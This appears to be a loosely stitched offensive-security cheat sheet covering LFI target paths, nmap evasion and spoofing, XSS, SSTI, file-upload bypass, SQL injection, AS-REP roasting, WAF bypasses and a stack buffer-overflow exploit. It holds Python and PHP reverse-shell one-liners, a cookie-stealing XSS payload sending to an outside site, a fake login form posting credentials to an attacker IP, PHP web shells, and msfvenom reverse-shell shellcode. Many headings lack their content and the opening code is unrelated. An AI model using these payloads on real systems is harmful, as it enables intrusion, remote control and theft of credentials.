    pdf_paths = ["file1.pdf", "file2.pdf", "file3.pdf"]
    creation_dates = []
    for path in pdf_paths:
        creation_date = extract_creation_date(path)
        if creation_date:
            creation_dates.append((path, creation_date))
    
    creation_dates.sort(key=lambda x: x[1])
    print("PDF Creation Dates (in chronological order):")
    for i, (pdf_path, date) in enumerate(creation_dates, start=1):
        print(f"{i}. {pdf_path} - {date}")

php://input
C:\boot.ini
C:\WINDOWS\win.ini
C:\WINDOWS\php.ini
C:\WINDOWS\System32\Config\SAM
C:\WINNT\php.ini
C:\xampp\phpMyAdmin\config.inc
C:\xampp\phpMyAdmin\phpinfo.php
C:\xampp\phpmyadmin\config.inc
C:\xampp\phpmyadmin\phpinfo.php
C:\xampp\phpmyadmin\config.inc.php
C:\xampp\phpMyAdmin\config.inc.php
C:\xampp\apache\conf\httpd.conf
C:\xampp\FileZillaFTP\FileZilla Server.xml
C:\xampp\MercuryMail\mercury.ini
C:\mysql\bin\my.ini
C:\xampp\php\php.ini
C:\xampp\phpMyAdmin\config.inc.php
C:\xampp\tomcat\conf\tomcat-users.xml
C:\xampp\tomcat\conf\web.xml
C:\xampp\sendmail\sendmail.ini
C:\xampp\webalizer\webalizer.conf
C:\xampp\webdav\webdav.txt
C:\xampp\apache\logs\error.log
C:\xampp\apache\logs\access.log
C:\xampp\FileZillaFTP\Logs
C:\xampp\FileZillaFTP\Logs\error.log
C:\xampp\FileZillaFTP\Logs\access.log
C:\xampp\MercuryMail\LOGS\error.log
C:\xampp\MercuryMail\LOGS\access.log
C:\xampp\mysql\data\mysql.err
C:\xampp\sendmail\sendmail.log
C:\apache\log\error.log
C:\apache\log\access.log
C:\apache\log\error_log
C:\apache\log\access_log
C:\apache2\log\error.log
C:\apache2\log\access.log
C:\apache2\log\error_log
C:\apache2\log\access_log
C:\log\error.log
C:\log\access.log
C:\log\error_log
C:\log\access_log
C:\apache\logs\error.log
C:\apache\logs\access.log
C:\apache\logs\error_log
C:\apache\logs\access_log
C:\apache2\logs\error.log
C:\apache2\logs\access.log
C:\apache2\logs\error_log
C:\apache2\logs\access_log
C:\logs\error.log
C:\logs\access.log
C:\logs\error_log
C:\logs\access_log
C:\log\httpd\access_log
C:\log\httpd\error_log
C:\logs\httpd\access_log
C:\logs\httpd\error_log
C:\opt\xampp\logs\access_log
C:\opt\xampp\logs\error_log
C:\opt\xampp\logs\access.log
C:\opt\xampp\logs\error.log
C:\Program Files\Apache Group\Apache\logs\access.log
C:\Program Files\Apache Group\Apache\logs\error.log
C:\Program Files\Apache Group\Apache\conf\httpd.conf
C:\Program Files\Apache Group\Apache2\conf\httpd.conf
C:\Program Files\xampp\apache\conf\httpd.conf

-Pn # disables the ping command and only scans ports
-f # used to fragment the packets (i.e. split them into smaller pieces) making it less likely that the packets will be detected by a firewall or IDS.
# ALTERNATIVES TO -f, but providing more control over the size of the packets: 
--mtu <number> # accepts a maximum transmission unit size to use for the packets sent. This must be a multiple of 8.
--scan-delay <time> # in ms, used to add a delay between packets sent. This is very useful if the network is unstable, but also for evading any time-based firewall/IDS triggers which may be in place.
--badsum # this is used to generate in invalid checksum for packets. Any real TCP/IP stack would drop this packet, however, firewalls may potentially respond automatically, without bothering to check the checksum of the packet. As such, this switch can be used to determine the presence of a firewall/IDS.

# Scan from spoofed IP
nmap 192.168.1.1 -D 192.168.1.2

# Scan Facebook from Microsoft
nmap -S www.microsoft.com www.facebook.com

# Use a specific source port
nmap 192.168.1.1 -g 53

# http site map generator
nmap -Pn --script=http-sitemap-generator scanme.nmap.org 

# Fast search for random web servers
nmap -n -Pn -p 80 --open -sV -vvv --script banner,http-title -iR 1000 

# Brute forces DNS hostnames guessing subdomains
nmap -Pn --script=dns-brute domain.com

# Safe SMB scripts to run
nmap -n -Pn -vv -O -sV --script smb-enum*,smb-ls,smb-mbenum,smb-os-discovery,smb-s*,smb-vuln*,smbv2* -vv 192.168.1.1 

# Whois query
nmap --script whois* domain.com 

# Detect cross site scripting vulnerabilities.
nmap -p80 --script http-unsafe-output-escaping scanme.nmap.org 

# Check for SQL injections
nmap -p80 --script http-sql-injection scanme.nmap.org

# Use in most cases : Noisy AF
rustscan -a 0.0.0.0 -- -A -sC -sV -oN initial.log

# SYN "Stealth" scan
sudo rustscan -a 0.0.0.0 -- -vv -oN Initial-SYN-Scan

# Service Scan
sudo rustscan -a 0.0.0.0 -p 22,53,80,443 -- -sV -Pn -vv

# Multiple IP Scanning
rustscan -a 0.0.0.0,1.1.1.1

# CIDR support
rustscan -a 192.168.0.0/30

# Selected port scanning
rustscan -a 0.0.0.0 -p 53,80,121,65535

# Ranges of ports
rustscan -a 0.0.0.0 --range 1-1000

# UDP scan
rustscan -a 0.0.0.0 -sU -p ports

python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4242));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

python -c 'import socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4242));subprocess.call(["/bin/sh","-i"],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())'

php -r '$sock=fsockopen("10.0.0.1",4242);exec("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("10.0.0.1",4242);shell_exec("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("10.0.0.1",4242);`/bin/sh -i <&3 >&3 2>&3`;'
php -r '$sock=fsockopen("10.0.0.1",4242);system("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("10.0.0.1",4242);passthru("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("10.0.0.1",4242);popen("/bin/sh -i <&3 >&3 2>&3", "r");'

# for each ip bloc :
blocip=0.0.0.0
filename=$(echo $blocip | tr '/' '-')
nmap -sn -v $blocip -oA ./${filename}_up --min-rate 1000
grep Up ${filename}_up.gnmap | awk '{print $2}' > ip-up-${filename}.txt
nmap -p- --open -sV -Pn -sT -v -iL ip-up-${filename}.txt -oA ./${filename}-full-scan --min-rate 1000

HTML | XSS

XSS

Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user.

Types

Stored XSS

The injected script is permanently stored on the target servers, such as in a database, in a message forum, visitor log, comment field, etc. The victim then retrieves the malicious script from the server when it requests the stored information.

Reflected XSS

Reflected attacks are those where the injected script is reflected off the web server, such as in an error message, search result, or any other response that includes some or all of the input sent to the server as part of the request.

Explanations

Let’s say a web page has a search box, which displays the search text alongside the search results as follows : Your search results for “searchtext”:

The web page also uses the HTTP GET request method to embed the user’s input data to the query string of the URL as follows: https://example.com/action.php?query=searchtext

If the search box is susceptible to a non-persistent XSS attack, a cybercriminal can send a malicious link to an unsuspecting user and exploit the vulnerability. This is how the script-injected link could look like:

DOM XSS

DOM Based XSS (or as it is called in some texts, “type-0 XSS”) is an XSS attack wherein the attack payload is executed as a result of modifying the DOM “environment” in the victim’s browser used by the original client side script, so that the client side code runs in an “unexpected” manner.

That is, the page itself (the HTTP response that is) does not change, but the client side code contained in the page executes differently due to the malicious modifications that have occurred in the DOM environment.

Let’s take the following example of a web page that utilizes JavaScript to manipulate a DOM element:

As you can see on the code snippet above, the value from a user input field is grabbed and appended to an element within the web page’s HTML. If an attacker can control this value, they can craft a devious value that forces their own code to be executed.

Here is an example :

Your search results for: “<script>document.location=’https://xssattacksite.com/log.php?c=’ + document.cookie</script>”

Payloads

Examples

N.B.

alert() print()

Use print instead of alert

Beef

Install & Config

Control

Mitigations

Developers should implement a whitelist of allowable inputs, and if not possible then there should be some input validations and the data entered by the user must be filtered as much as possible.
Output encoding is the most reliable solution to combat XSS i.e. it takes up the script code and thus converts it into the plain text.
A WAF (Web Application Firewall) should be implemented as it somewhere protects the application from XSS attacks.

HTML Injection

Check

Form fields
- Exploit with BurpSuite using URL Encode

Payloads

Mitigations

The developer should set up his HTML script which filters the meta-characters from user inputs.
The developer should implement functions to validate the user inputs such that they do not contain any specific tag that can lead to virtual defacement.

Find passwords

MimiPenguin

Takes advantage of cleartext credentials in memory by dumping the process and extracting lines that have a high probability of containing cleartext passwords. Must have root permissions.

# install
git clone https://github.com/huntergregal/mimipenguin.git
cd mimipenguin/

# usage
./mimipenguin.sh

Home Directories

User's home directories can contain plaintext passwords. For example :

Configuration Files

/etc directory and subdirectories

Scheduled Jobs

The cron configuration files and systemd timer units might contain scripts with embedded credentials.

Application Files

Custom applications might store passwords in their configuration files. Check any locations where you have custom software installed.

# Change :
# Content-Disposition: form-data; name="avatar"; filename="secrets.php"
# to
# Content-Disposition: form-data; name="avatar"; filename="../secrets.php"

# You can encode "../" as :
    %2e%2e%2f
    %252e%252e%252f
    ..%c0%af
    ..%ef%bc%8f
# Then access the file with LFI :
# GET /files/avatars/../secrets.php

# First, upload a malicious .htaccess :
# Content-Disposition: form-data; name="avatar"; filename=".htaccess"
# Content-Type: text/plain

# AddType application/x-httpd-php .l33t

# Then upload the php file with .l33t extention
# Content-Disposition: form-data; name="avatar"; filename="secrets.l33t"
# Content-Type: application/x-php

<?php echo file_get_contents('/home/carlos/secret'); ?>
# or
<?php system($_GET['cmd']); ?>

# You can add :
GIF89a; // at the beginning of the php file or in the burp request

# Burp request
# Content-Disposition: form-data; name="avatar"; filename="secrets.php"
# Content-Type: application/x-php

# GIF89a at the beginning of the php command
GIF89a;<?php echo file_get_contents('/home/carlos/secret'); ?>
# OR
GIF89a;<?php system($_GET['cmd']); ?>

# example 1
exiftool -Comment="<?php echo 'START ' . 
file_get_contents('/home/carlos/secret') . ' END'; ?>" <YOUR-INPUT-IMAGE>.jpg -o polyglot.php

# example 2
exiftool -Comment="<?php echo 'START ' . 
system($_GET['cmd']); . ' END'; ?>" $input.jpg -o polyglot.php

git clone https://github.com/sAjibuu/upload_bypass.git
cd upload_bypass/
pip3 install -r requirements.txt

python3 ext_bypass.py -u $url -e $extension-file -a $allowed-extension -s $success-msg --location $path-of-uploaded-file

-------------------------------------------------------------------
Polyglot:
${{<%[%'"}}%\

-------------------------------------------------------------------
FreeMarker (Java):
${7*7} = 49
<#assign command="freemarker.template.utility.Execute"?new()> ${ command("cat /etc/passwd") }
--------------------------------------------------------------------
(Java):
${7*7}
${{7*7}}
${class.getClassLoader()}
${class.getResource("").getPath()}
${class.getResource("../../../../../index.htm").getContent()}
${T(java.lang.System).getenv()}
${product.getClass().getProtectionDomain().getCodeSource().getLocation().toURI().resolve('/etc/passwd').toURL().openStream().readAllBytes()?join(" ")}
--------------------------------------------------------------------
Twig (PHP):
{{7*7}}
{{7*'7'}}
{{dump(app)}}
{{app.request.server.all|join(',')}}
"{{'/etc/passwd'|file_excerpt(1,30)}}"@
{{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}}
--------------------------------------------------------------------
Smarty (PHP):
{$smarty.version}
{php}echo `id`;{/php}
{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php passthru($_GET['cmd']); ?>",self::clearConfig())}
-------------------------------------------------------------------
Handlebars (NodeJS):
wrtz{{#with "s" as |string|}}
{{#with "e"}}
{{#with split as |conslist|}}
{{this.pop}}
{{this.push (lookup string.sub "constructor")}}
{{this.pop}}
{{#with string.split as |codelist|}}
{{this.pop}}
{{this.push "return require('child_process').exec('whoami');"}}
{{this.pop}}
{{#each conslist}}
{{#with (string.sub.apply 0 codelist)}}
{{this}}
{{/with}}
{{/each}}
{{/with}}
{{/with}}
{{/with}}
{{/with}}
-------------------------------------------------------------------
Velocity:
#set($str=$class.inspect("java.lang.String").type)
#set($chr=$class.inspect("java.lang.Character").type)
#set($ex=$class.inspect("java.lang.Runtime").type.getRuntime().exec("whoami"))
$ex.waitFor()
#set($out=$ex.getInputStream())
#foreach($i in [1..$out.available()])
$str.valueOf($chr.toChars($out.read()))
#end
-------------------------------------------------------------------
ERB (Ruby):
<%= system("whoami") %>
<%= Dir.entries('/') %>
<%= File.open('/example/arbitrary-file').read %>
-------------------------------------------------------------------
Django Tricks (Python):
{% debug %}
{{settings.SECRET_KEY}}
--------------------------------------------------------------------
Tornado (Python):
{% import foobar %} = Error
{% import os %}{{os.system('whoami')}}
--------------------------------------------------------------------
Mojolicious (Perl):
<%= perl code %>
<% perl code %>
-------------------------------------------------------------------
Flask/Jinja2: Identify:
{{ '7'*7 }}
{{ [].class.base.subclasses() }} # get all classes
{{''.class.mro()[1].subclasses()}}
{%for c in [1,2,3] %}{{c,c,c}}{% endfor %}


-------------------------------------------------------------------
Flask/Jinja2: 
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}
--------------------------------------------------------------------
Jade:
#{root.process.mainModule.require('child_process').spawnSync('cat', ['/etc/passwd']).stdout}
--------------------------------------------------------------------
Razor (.Net):
@(1+2)
@{// C# code}
--------------------------------------------------------------------
ASP:
<%response.write(date())%>.
<% Response.Write("testing execution") %>
<%="testing execution" %>

File sharing

lightweight Web Server

# python
python -m SimpleHTTPServer 8080
python3 -m http.server

# busybox
busybox httpd --help # show available options
busybox httpd -p 127.0.0.1:8080 -h /var/www/  # start start httpd 
pkill busybox  # to stop busybo httpd

# npm
http-server

# php
php -S 127.0.0.1:8080

Others

# curl
curl -O http://192.168.0.101/file.txt

# nc
# to share
nc -lvp 4444 < file
# to receive
nc 192.168.1.102 4444 > file

# scp
scp /path/to/source/file.ext [email protected]:/path/to/destination/file.ext

Exploits

Take Control of EIP

One of the most important aspects of a stack-based buffer overflow is to get the instruction pointer (EIP) under control, so we can tell it to which address it should jump. This will make the EIP point to the address where our shellcode starts and causes the CPU to execute it.

Determine the Offset

The offset is used to determine how many bytes are needed to overwrite the buffer and how much space we have around our shellcode.

Create pattern

Shellcode is a program code that contains instructions for an operation that we want the CPU to perform. The manual creation of the shellcode will be discussed in more detail in other modules. But to save some time first, we use the Metasploit Framework (MSF) that offers a Ruby script called “pattern_create” that can help us determine the exact number of bytes to reach the EIP. It creates a unique string based on the length of bytes you specify to help determine the offset.

If we now use precisely this number of bytes for our "U"s, we should land exactly on the EIP. To overwrite it and check if we have reached it as planned, we can add 4 more bytes with "\x66" and execute it to ensure we control the EIP.

The EIP has been overwritten with our \x66 characters.

Next, we have to find out how much space we have for our shellcode, which then executes the commands we intend. As we control the EIP now, we will later overwrite it with the address pointing to our shellcode's beginning.

Examine the register and find the address of EBP

Determine the Length for Shellcode

We have to find out approximately how big our shellcode will be that we will insert, and for this, we will use msfvenom.

Shellcode length

We need a total of 1040 bytes to get to the EIP.
Here, we can use an additional 100 bytes of NOPs
150 bytes for our shellcode.

Buffer

Now we can try to find out how much space we have available to insert our shellcode.

Identification of Bad Characters

Here we use the following character list to find out all characters we have to consider and to avoid when generating our shellcode.

We need to calculate our buffer again.

Look at the whole main function to set a breakpoint at the corresponding function so that the execution stops at this point and we can analyze the memory's content :

Generate shellcode

msfvenom

findDelegation

`Impacket-findDelegation`

Simple script to quickly list all delegation relationships (unconstrained, constrained, resource-based constrained) in an AD environment.

findDelegation.py "DOMAIN"/"USER":"PASSWORD"

# --user feature in 2021
findDelegation.py -user "account" "DOMAIN"/"USER":"PASSWORD"

More about delegations

let searchText = document.getElementById(‘searchText’).value;
let resultsData = document.getElementById(‘resultsData’);
resultsData.innerHTML = ‘Your search results for: ‘ + searchText;

<!-- put this into a form field or search bar-->
<img src=q onError=prompt('!XSS!'); />
<script>alert("!XSS!")</script>
<script>print()</script>

<!-- encoded -->
%uff1cscript%uff1eprompt("!XSS!");%uff1c/script%uff1e&
%253Cscript%253Eprint()%253C%252Fscript%253E
%253Cimg%2520src%253Dq%2520onError%253Dalert(%2522XSS%2522)%253B%2520%252F%253E

<!-- Bypassing First Filter -->
<svg/onload=alert(1)>
<svg//////onload=alert(1)>
<svg id=x;onload=alert(1)>
<svg id=`x`onload=alert(1)>
<svg%09onload=alert(1)>
<svg onload%09=alert(1)>
<svg%09onload%20=alert(1)>
<svg onload%09%20%28%2C%3B=alert(1)>
<svg onload+0B=alert(1)>
<script>\u0061lert(1)</script>
<script>\u0061\u006c\u0065\u0072\u0074(1)</script>
<img src=x onerror="\u0061lert"/>
<img src=x onerror="eval('\141lert(1)')"/>
<img src=x onerror="eval('\x61lert(1)')"/>

 <!-- Javascript Keyword is blocked-->
<object data="JaVaScRiPt:alert(1)">
<object data="javascript&colon;alert(1)">
<object data="java  
    script:alert(1)">
<object data="javascript&#x003A;alert(1)">
<object data="javascript&#58;alert(1)">
<object data="&#x6A;avascript;alert(1)">
<object data="&#x6A;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;74;&#x3A;alert(1)">
<object data="data:text/html,<script>alert(1)</script>">
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">

<!-- URL ENCODE THESE & put them in a form field -->
<b>test</b>
<a href="https://google.com">test</a>
<img src= "https://www.ignitetechnologies.in/img/logo-blue-white.png">

<!-- add a form field to website -->
<div style="position: absolute; left: 0px; top: 0px; width: 1900px; height: 1300px; z-index:1000; background-color:white; padding:1em;">Please login with valid 
credentials:<br><form name="login" action="http://192.168.0.7:4444/login.htm">
<table><tr><td>Username:</td><td><input type="text" name="username"/></td></tr><tr><td>Password:</td>
<td><input type="text" name="password"/></td></tr><tr>
<td colspan=2 align=center><input type="submit" value="Login"/></td></tr>
</table></form>

# find config files : 
find / ! -path "*/proc/*" -iname "*config*" -type f 2>/dev/null

# (system user account information)
/etc/passwd
/etc/shadow
# (MySQL configuration)
/etc/my.cnf
/etc/mysql/my.cnf
~/.my.cnf
/etc/mysql/conf.d/
/etc/mysql/mysql.conf.d/
/var/lib/mysql/mysql/user.MYD
# (PostgreSQL configuration)
/var/lib/pgsql/data/postgresql.conf 
pg_hba.conf
pg_ident.conf
# (web server configuration)
/etc/httpd/conf/httpd.conf
/etc/nginx/nginx.conf 
/var/apache2/config.inc
# (SSH server configuration)
/etc/ssh/sshd_config
# (Web Server configuration)
/etc/httpd/conf/*
/etc/nginx/*
# (Tomcat configuration)
tomcat-users.xml
find / -name 'tomcat-users.xml'

# Inject cmd parameter
' union select 1,<php_payload>,3,4 into outfile <path> --
' union select 1,'<?php system($_GET["cmd"]); ?>',3,4 intooutfile 'C:\\xampp\\htdocs\\rce.php' --

# Reverse Shell created. Access from outside :
<host>/rce.php?cmd=<command>

# Test :
127.0.0.1/rce.php?cmd=time
# Result : The current time is: 16:22:25.20 Enter the new time: 3 4

❯ /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 1200 > pattern.txt
cat pattern.txt
Aa0Aa1Aa2Aa3Aa4Aa5...<SNIP>...Bn6Bn7Bn8Bn9

# GDB using the generated payload
(gdb) run $(python -c "print 'Aa0Aa1Aa2Aa3Aa4Aa5...<SNIP>...Bn6Bn7Bn8Bn9'") 
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/student/bow/bow32 $(python -c "print 'Aa0Aa1Aa2Aa3Aa4Aa5...<SNIP>...Bn6Bn7Bn8Bn9'")
Program received signal SIGSEGV, Segmentation fault.
0x69423569 in ?? ()

# GDB - EIP
(gdb) info registers eip
eip            0x69423569	0x69423569

# CALCULATING THE OFFSET
# We see that the EIP displays a different memory address, and we can use another MSF tool called "pattern_offset" to calculate the exact number of characters (offset) needed to advance to the EIP.
❯ /usr/bin/ruby /opt/metasploit-framework/embedded/framework/tools/exploit/pattern_offset.rb -q 0x69423569
[*] Exact match at offset 1036

(gdb) run $(python -c "print '\x55' * 1036 + '\x66' * 4")

The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/student/bow/bow32 $(python -c "print '\x55' * 1036 + '\x66' * 4")
Program received signal SIGSEGV, Segmentation fault.
0x66666666 in ?? ()

# characters list

CHARS="\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"

# string length
echo $CHARS | sed 's/\\x/ /g' | wc -w
256

(gdb) disas main

# setting the breakpoint at the function
(gdb) break bowfunc

# send chars
(gdb) run $(python -c 'print "\x55" * (1040 - 256 - 4) + "\x00\x01\x02\x03\x04\x05...<SNIP>...\xfc\xfd\xfe\xff" + "\x66" * 4')

# look at the stack
(gdb) x/2000xb $esp+500

# identify all bad characters - look where the chars start
# adjust the number of chars from the one who are bad
# Substract the number of removed characters

# Buffer = "\x55" * (1040 - 255 - 4) = 781
# "\x00" removed: 256 - 1 = 255 bytes
# CHARS = "\x01\x02\x03...<SNIP>...\xfd\xfe\xff"
# EIP = "\x66" * 4

# send without the null byte
(gdb) run $(python -c 'print "\x55" * (1040 - 255 - 4) + "\x01\x02\x03\x04\x05...<SNIP>...\xfc\xfd\xfe\xff" + "\x66" * 4')

# the stack
x/2000xb $esp+550

# check for other bad chars ... etc

# syntahx
msfvenom -p linux/x86/shell_reverse_tcp lhost=<LHOST> lport=<LPORT> --format c --arch x86 --platform linux --bad-chars "<chars>" --out <filename>

# real command
msfvenom -p linux/x86/shell_reverse_tcp lhost=127.0.0.1 lport=31337 --format c --arch x86 --platform linux --bad-chars "\x00\x09\x0a\x20" --out shellcode

# content of shellcode
❯ cat shellcode
unsigned char buf[] = 
"\xbe\x6e\x05\xb5\x18\xdd\xc1\xd9\x74\x24\xf4\x5a\x31\xc9"
"\xb1\x12\x31\x72\x12\x03\x72\x12\x83\x84\xf9\x57\xed\x69"
"\xd9\x6f\xed\xda\x9e\xdc\x98\xde\xa9\x02\xec\xb8\x64\x44"
"\x9e\x1d\xc7\x7a\x6c\x1d\x6e\xfc\x97\x75\x0e\xfe\x67\x84"
"\x98\xfc\x67\xfc\x31\x88\x89\xb0\xa4\xda\x18\xe3\x9b\xd8"
"\x13\xe2\x11\x5e\x71\x8c\xc7\x70\x05\x24\x70\xa0\xc6\xd6"
"\xe9\x37\xfb\x44\xb9\xce\x1d\xd8\x36\x1c\x5d";

# Now that we have our shellcode, we adjust it to have only one string, and then we can adapt and submit our simple exploit again.

# Buffer = "\x55" * (1040 - 124 - 95 - 4) = 817
# NOPs = "\x90" * 124
# Shellcode = "\xda\xca\xba\xe4\x11...<SNIP>...\x5a\x22\xa2"
# EIP = "\x66" * 4'

# EXPLOIT
(gdb) run $(python -c 'print "\x55" * (1040 - 124 - 95 - 4) + "\x90" * 124 + ""\xbe\x6e\x05\xb5\x18\xdd\xc1\xd9\x74\x24\xf4\x5a\x31\xc9\xb1\x12\x31\x72\x12\x03\x72\x12\x83\x84\xf9\x57\xed\x69\xd9\x6f\xed\xda\x9e\xdc\x98\xde\xa9\x02\xec\xb8\x64\x44\x9e\x1d\xc7\x7a\x6c\x1d\x6e\xfc\x97\x75\x0e\xfe\x67\x84\x98\xfc\x67\xfc\x31\x88\x89\xb0\xa4\xda\x18\xe3\x9b\xd8\x13\xe2\x11\x5e\x71\x8c\xc7\x70\x05\x24\x70\xa0\xc6\xd6\xe9\x37\xfb\x44\xb9\xce\x1d\xd8\x36\x1c\x5d"" + "\x66" * 4')

# reverse shell 
nc -lvnp 31337

# MISC of commands
# list of users in users file
for user in $(cat users); do GetNPUsers.py -no-pass -dc-ip $ip $domain/${user} | grep -v Impacket; done

GetNPUsers.py -dc-ip $ip -request $domain/

GetNPUsers.py -dc-ip $ip -request $domain/ -format hashcat/john

GetNPUsers.py -dc-ip $ip -usersfile users.txt $domain/

GetNPUsers.py $domain/backup -no-pass

GetNPUsers.py -no-pass $domain/ -usersfile users.txt -format hashcat -outputfile hashes.txt

# LinkedinMama3 - https://github.com/h0useh3ad/LinkedinMama3
git clone https://github.com/h0useh3ad/LinkedinMama3.git
cd LinkedinMama3/
pip3 install -r requirements.txt

python3 LinkedinMama3.py -k $company_name -e $company_domain -n $email_format -c $linkedin_company_ID

# check if some are pwned - https://github.com/thewhiteh4t/pwnedOrNot
git clone https://github.com/thewhiteh4t/pwnedOrNot.git
cd pwnedOrNot/
chmod +x install.sh
./install.sh

nano config.json # add hibp api key
python3 pwnedornot.py -f mails-list.txt

Fundamentals

Buffer overflows are errors that allow data that is too large to fit into a buffer of the operating system's memory that is not large enough, thereby overflowing this buffer. As a result of this mishandling, the memory of other functions of the executed program is overwritten, potentially creating a security vulnerability.

File formats binary :

Portable Executable Format (PE) - Microsoft Platforms
Executable and Linking Format (ELF) - UNIX

The Memory

.text : contains the actual assembler instructions of the program. This area can be read-only to prevent the process from accidentally modifying its instructions. Any attempt to write to this area will inevitably result in a segmentation fault.
.data : contains global and static variables that are explicitly initialized by the program.
.bss : Several compilers and linkers use the .bss section as part of the data segment, which contains statically allocated variables represented exclusively by 0 bits.

About Stack

Modern memory protections (DEP/ASLR) would prevent the damaged caused by buffer overflows. DEP (Data Execution Prevention), marked regions of memory "Read-Only". The read-only memory regions is where some user-input is stored (Example: The Stack), so the idea behind DEP was to prevent users from uploading shellcode to memory and then setting the instruction pointer to the shellcode. Hackers started utilizing ROP (Return Oriented Programming) to get around this, as it allowed them to upload the shellcode to an executable space and use existing calls to execute it. With ROP, the attacker needs to know the memory addresses where things are stored, so the defense against it was to implement ASLR (Address Space Layout Randomization) which randomizes where everything is stored making ROP more difficult.

Vulnerable functions in C

strcpy
gets
sprintf
scanf

CPU Registers

Data registers

32-bit Register

64-bit Register

Description

Pointer registers

32-bit Register

64-bit Register

Description

Stack frames

Since the stack starts with a high address and grows down to low memory addresses as values are added, the Base Pointer points to the beginning (base) of the stack in contrast to the Stack Pointer, which points to the top of the stack.

As the stack grows, it is logically divided into regions called Stack Frames, which allocate the required memory in the stack for the corresponding function. A stack frame defines a frame of data with the beginning (EBP) and the end (ESP) that is pushed onto the stack when a function is called.

Prevention

Canaries

The canaries are known values written to the stack between buffer and control data to detect buffer overflows. The principle is that in case of a buffer overflow, the canary would be overwritten first and that the operating system checks during runtime that the canary is present and unaltered.

Address Space Layout Randomization (ASLR)

Address Space Layout Randomization (ASLR) is a security mechanism against buffer overflows. It makes some types of attacks more difficult by making it difficult to find target addresses in memory. The operating system uses ASLR to hide the relevant memory addresses from us. So the addresses need to be guessed, where a wrong address most likely causes a crash of the program, and accordingly, only one attempt exists.

Data Execution Prevention (DEP)

DEP is a security feature available in Windows XP, and later with Service Pack 2 (SP2) and above, programs are monitored during execution to ensure that they access memory areas cleanly. DEP terminates the program if a program attempts to call or access the program code in an unauthorized manner.

Containers

An even further defense mechanism is called a container, which is another layer of Data Execution Prevention. The container attempts to identify all possible results of code from data within the buffer (or the data segment) and then prevent the application from calling external functions in shared objects from the inside of the buffer. A version of this has been implemented in Cisco Security Agent, or CSA. Linux's GrSec and PaX kernel patches also implement their own version of contained memory space.

# blocked by waf
<Svg/x=">"/OnLoAD=confirm()//
# bypassed
%3CSvg%2Fx%3D%22%3E%22%2FOnLoAD%3Dconfirm%28%29%2F%2F

# blocked by waf
UniOn(SeLeCt 1,2,3,4,5,6,7,8,9,10)
# bypassed
UniOn%28SeLeCt+1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%29

# url example
https://example.com/page.php?id=1%252f%252a*/UNION%252f%252a /SELECT

# basic request
<marquee onstart=prompt()>

# obfuscated
<marquee onstart=\u0070r\u06f\u006dpt()>

# blocked by waf
/?redir=http://google.com

# bypassed
/?redir=http://google。com (Unicode alternative)

# blocked by waf
<marquee loop=1 onfinish=alert()>x

# bypassed
＜marquee loop＝1 onfinish＝alert︵1)>x (Unicode alternative)

# basic request
../../etc/shadow

# obfuscated
%C0AE%C0AE%C0AF%C0AE%C0AE%C0AFetc%C0AFshadow

# blocked by waf
<script>confirm()</script>

# bypassed
<!--><script>confirm/**/()/**/</script>

# blocked by waf
/?id=1+union+select+1,2--

# bypassed
